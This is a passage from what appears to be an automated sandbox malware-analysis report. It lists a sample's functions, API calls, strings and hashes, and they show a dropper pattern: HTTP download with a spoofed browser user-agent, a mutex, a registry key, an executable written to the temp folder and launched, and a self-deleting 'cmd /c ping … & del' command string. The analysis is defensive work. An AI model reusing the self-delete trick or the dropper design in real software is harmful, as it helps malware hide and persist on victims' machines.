                                                                                                                                                                                                                                                                • Part of subcall function 00401C40: WideCharToMultiByte.KERNEL32(00000000,00000000,?,004024CA,00000000,?,00000000,00000000,?,?,004024CC,00000000,?,?,?,00000004), ref: 00401CA7
                                                                                                                                                                                                                                                                • Part of subcall function 00401EF0: std::_String_base::_Xlen.LIBCPMT ref: 00401F16
                                                                                                                                                                                                                                                                • Part of subcall function 00401EF0: std::_String_base::_Xlen.LIBCPMT ref: 00401F2E
                                                                                                                                                                                                                                                                • Part of subcall function 00401EF0: _memcpy_s.LIBCMT ref: 00401FA9
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: __lock.LIBCMT ref: 00402B75
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: ___sbh_find_block.LIBCMT ref: 00402B80
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: ___sbh_free_block.LIBCMT ref: 00402B8F
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: HeapFree.KERNEL32(00000000,?,0044A918,0000000C,00405245,00000000,0044A9E0,0000000C,0040527D,?,?,?,0040BD2E,00000004,0044AD90,0000000C), ref: 00402BBF
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: GetLastError.KERNEL32(?,00403D95,00402CED,00000000,004018C3,?), ref: 00402BD0
                                                                                                                                                                                                                                                              • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 0040253E
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 0040255C
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: __FF_MSGBANNER.LIBCMT ref: 00402C57
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: __NMSG_WRITE.LIBCMT ref: 00402C5E
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: HeapAlloc.KERNEL32(00000000,?,74E96E60,?,?,00000000,004018C3,?), ref: 00402CAC
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00402579
                                                                                                                                                                                                                                                              • WinHttpReadData.WINHTTP(00000000,00000000,?,?,?,?,?,00000004,?,?,?,?,?,?,00000000), ref: 0040258D
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000004,?,?,?,?,?,?,00000000), ref: 00402597
                                                                                                                                                                                                                                                              • _printf.LIBCMT ref: 004025A3
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00402633
                                                                                                                                                                                                                                                              • _printf.LIBCMT ref: 0040263F
                                                                                                                                                                                                                                                              • _printf.LIBCMT ref: 0040264E
                                                                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(00000000), ref: 0040265F
                                                                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(?), ref: 0040266E
                                                                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(00000000), ref: 00402679
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • GET, xrefs: 004022D8
                                                                                                                                                                                                                                                              • P, xrefs: 00402294
                                                                                                                                                                                                                                                              • HTTP/1.1, xrefs: 00402391
                                                                                                                                                                                                                                                              • A WinHTTP Example Program/1.0, xrefs: 0040231F
                                                                                                                                                                                                                                                              • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 004023EC
                                                                                                                                                                                                                                                              • Out of memory., xrefs: 00402649
                                                                                                                                                                                                                                                              • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 0040259E, 0040263A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Http$_malloc_memset$ByteCharErrorHeadersLastMultiQueryRequestWide$CloseHandleOption_printf$DataHeapOpenString_base::_Xlenstd::_$AllocAvailableConnectFreeReadReceiveResponseSendTimeouts___sbh_find_block___sbh_free_block__lock_memcpy_s_wcscpy_s
                                                                                                                                                                                                                                                              • String ID: A WinHTTP Example Program/1.0$GET$HTTP/1.1$Out of memory.$P$User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$WinHttpQueryDataAvailable failed. Error = %d
                                                                                                                                                                                                                                                              • API String ID: 673926172-2034049678
                                                                                                                                                                                                                                                              • Opcode ID: 565462e1c5bff0b3dc9d702d8aa2a3332098b1acf1a83422e2f178e65ad8004f
                                                                                                                                                                                                                                                              • Instruction ID: ff82c62c6b912ffc31d51c613d4f83982730b340667751f15dc3e3e3591e2bc6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 565462e1c5bff0b3dc9d702d8aa2a3332098b1acf1a83422e2f178e65ad8004f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CC1B2B1508300AFE310DF65DD49F2BB7E8AF84704F04492DF549A62D1E7B9A9048B6B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401160 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00401D20: InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?,?,?,?,0040117F), ref: 00401D2D
                                                                                                                                                                                                                                                                • Part of subcall function 00401D20: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,0040117F), ref: 00401D3C
                                                                                                                                                                                                                                                                • Part of subcall function 00401D20: CreateMutexA.KERNELBASE ref: 00401D65
                                                                                                                                                                                                                                                                • Part of subcall function 00401D20: GetLastError.KERNEL32 ref: 00401D6F
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401185
                                                                                                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE ref: 004011C3
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004011D2
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004011EE
                                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000,?,00000000), ref: 00401200
                                                                                                                                                                                                                                                              • _strcat_s.LIBCMT ref: 00401215
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateDescriptorSecurity$CloseDaclErrorExitInitializeLastMutexPathProcessTemp_memset_strcat_s
                                                                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\wfplwfs$wfplwfs.exe
                                                                                                                                                                                                                                                              • API String ID: 3495232838-1705779883
                                                                                                                                                                                                                                                              • Opcode ID: 8164ea224996456d5c85e065210af1ac7a5c41b46d1bdab59452248d2b12fa26
                                                                                                                                                                                                                                                              • Instruction ID: cb60fa91cc81e4e90a82963bc8d622d03ab09d8a06cc832782673108083636f2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8164ea224996456d5c85e065210af1ac7a5c41b46d1bdab59452248d2b12fa26
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A111B1716043006BE210EB62DD47F9A77985F44B48F00493EBB88B91E1EAB8E50486AF
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401D90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38processCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401DB5
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401DD1
                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,?,00000000,00000103), ref: 00401DE5
                                                                                                                                                                                                                                                              • _sprintf.LIBCMT ref: 00401DFC
                                                                                                                                                                                                                                                              • WinExec.KERNEL32(?,00000000), ref: 00401E0E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 00401DF6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                                                                                                                              • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                                                                                                                              • API String ID: 2874319085-10483710
                                                                                                                                                                                                                                                              • Opcode ID: 9c3e26a926a842d4e4b4e6196722f07a43c121864e3a86a85d35bac63e9fe959
                                                                                                                                                                                                                                                              • Instruction ID: 1bc8e0f4c2ba8fc4681a9972bc8b561cf557771a96e904f3328592ce273e4625
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c3e26a926a842d4e4b4e6196722f07a43c121864e3a86a85d35bac63e9fe959
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC01D6B5148340AAE360EB61CC47FDB77D89B98704F40491DB6D8961C2DAF85148CB97
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401E80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 167 401e80-401ec1 call 403de0 CreateProcessA 170 401ec3-401eda CloseHandle * 2 167->170 171 401edc-401ee3 167->171 170->171
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401E97
                                                                                                                                                                                                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,00000040), ref: 00401EB9
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00401ED3
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00401EDA
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseHandle$CreateProcess_memset
                                                                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                                                                              • API String ID: 3113380336-2746444292
                                                                                                                                                                                                                                                              • Opcode ID: 996977738300d47ca162c0988ae98d5e8f1b150c85c83538bb9ab776d9c47752
                                                                                                                                                                                                                                                              • Instruction ID: 6ef25eaaa144c8a55b8011ae8ee6f42b1ba10e96cd557a061aa5a60299586595
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 996977738300d47ca162c0988ae98d5e8f1b150c85c83538bb9ab776d9c47752
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DF062B11052207BD210AB5ADC45EDBBFACEFC5790F04451DBA4C92150D6749904CAF6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401790 Relevance: 7.6, APIs: 5, Instructions: 74timefileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 176 401790-4017a5 PathFileExistsA 177 401862-40186a 176->177 178 4017ab-4017c5 CreateFileA 176->178 178->177 179 4017cb-4017e3 GetFileTime 178->179 179->177 180 4017e5-40184b SystemTimeToFileTime call 40dba0 call 401710 179->180 180->177 185 40184d 180->185 186 401856-401861 185->186 187 40184f-401854 185->187 187->177 187->186
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • PathFileExistsA.KERNELBASE(?,00000000,00000000,00000000), ref: 0040179D
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 004017BC
                                                                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,?), ref: 004017DB
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32 ref: 00401818
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401836
                                                                                                                                                                                                                                                                • Part of subcall function 00401710: GetSystemTime.KERNEL32 ref: 00401746
                                                                                                                                                                                                                                                                • Part of subcall function 00401710: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040175C
                                                                                                                                                                                                                                                                • Part of subcall function 00401710: SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00401768
                                                                                                                                                                                                                                                                • Part of subcall function 00401710: __aulldiv.LIBCMT ref: 00401782
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Time$File$System$__aulldiv$CreateExistsPath
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1778554304-0
                                                                                                                                                                                                                                                              • Opcode ID: 999a577438b43cb15d1caf92832c3265a2a6222f7dfa4ba136f897c4d21c78cc
                                                                                                                                                                                                                                                              • Instruction ID: 7505ad14b93245b4483a3769130e64b2db1a1218ac86b08dd3846c5aa5b142d7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 999a577438b43cb15d1caf92832c3265a2a6222f7dfa4ba136f897c4d21c78cc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2721A73211531066D320EF25CC48E5BB7B9FFC1790F444D2EF545A61A0D775D549C35A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401E30 Relevance: 4.5, APIs: 3, Instructions: 30fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 188 401e30-401e66 CreateFileA WriteFile 189 401e68 188->189 190 401e6d-401e79 CloseHandle 188->190 189->190
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00401226), ref: 00401E45
                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,0040FD28,0003A000,?,00000000,?,?,?,00401226), ref: 00401E5E
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00401226), ref: 00401E6E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1065093856-0
                                                                                                                                                                                                                                                              • Opcode ID: cc6b2db37447bb746f459fb8156921df4c24895b8cfd188751d898ac9e74d014
                                                                                                                                                                                                                                                              • Instruction ID: b6c33105595a77bcc7addb2758e7591e903cbd8515135e6de0fef66a1c24447a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc6b2db37447bb746f459fb8156921df4c24895b8cfd188751d898ac9e74d014
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59E04FB63411207AF2341763AD0DF9B2A6CEBC2B62F14453DFA46E61C0DAB85805C2B9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00405094 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 191 405094-4050b2 HeapCreate 192 4050b4-4050b6 191->192 193 4050b7-4050c4 call 405039 191->193 196 4050c6-4050d3 call 405295 193->196 197 4050ea-4050ed 193->197 196->197 200 4050d5-4050e8 HeapDestroy 196->200 200->192
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,004032BF,00000001), ref: 004050A5
                                                                                                                                                                                                                                                              • HeapDestroy.KERNEL32 ref: 004050DB
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$CreateDestroy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3296620671-0
                                                                                                                                                                                                                                                              • Opcode ID: 205eb52ddebd31835b3475517bcc4e86ffe4564f0aae5a3cc1c5a8a977c547be
                                                                                                                                                                                                                                                              • Instruction ID: 70ad913ce263280af2ea94db80ecb2fb28f0b266601c7b3b53403862e8cdf109
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 205eb52ddebd31835b3475517bcc4e86ffe4564f0aae5a3cc1c5a8a977c547be
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21E09274B157019FEB516B31AC4972B3694FFA1756F204C3AF002E62E0EBBC85809E5D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00405FD0 Relevance: 3.0, APIs: 2, Instructions: 5COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 201 405fd0-405fde call 405faa ExitProcess
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ___crtCorExitProcess.LIBCMT ref: 00405FD4
                                                                                                                                                                                                                                                                • Part of subcall function 00405FAA: GetModuleHandleA.KERNEL32(mscoree.dll,00405FD9,?,004051D3,000000FF,0000001E,0044A9E0,0000000C,0040527D,?,?,?,0040BD2E,00000004,0044AD90,0000000C), ref: 00405FAF
                                                                                                                                                                                                                                                                • Part of subcall function 00405FAA: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00405FBF
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00405FDE
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2427264223-0
                                                                                                                                                                                                                                                              • Opcode ID: cbab5125a019086a16cb9cc32f61bf2ecd803ae556777c3c004c526ed532c230
                                                                                                                                                                                                                                                              • Instruction ID: 4c65ed3b2d67673e54aea00dadfe300993be5a82dacccca333f2f1e45f1a3a0c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbab5125a019086a16cb9cc32f61bf2ecd803ae556777c3c004c526ed532c230
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DB09230008101EAD6012B21EE0A80ABB61EB84600B008829F088500708B794C20AA06
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00406202 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 204 406202-40620a call 406134 206 40620f-406212 204->206
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _doexit.LIBCMT ref: 0040620A
                                                                                                                                                                                                                                                                • Part of subcall function 00406134: __lock.LIBCMT ref: 00406142
                                                                                                                                                                                                                                                                • Part of subcall function 00406134: __decode_pointer.LIBCMT ref: 00406171
                                                                                                                                                                                                                                                                • Part of subcall function 00406134: __decode_pointer.LIBCMT ref: 0040617E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __decode_pointer$__lock_doexit
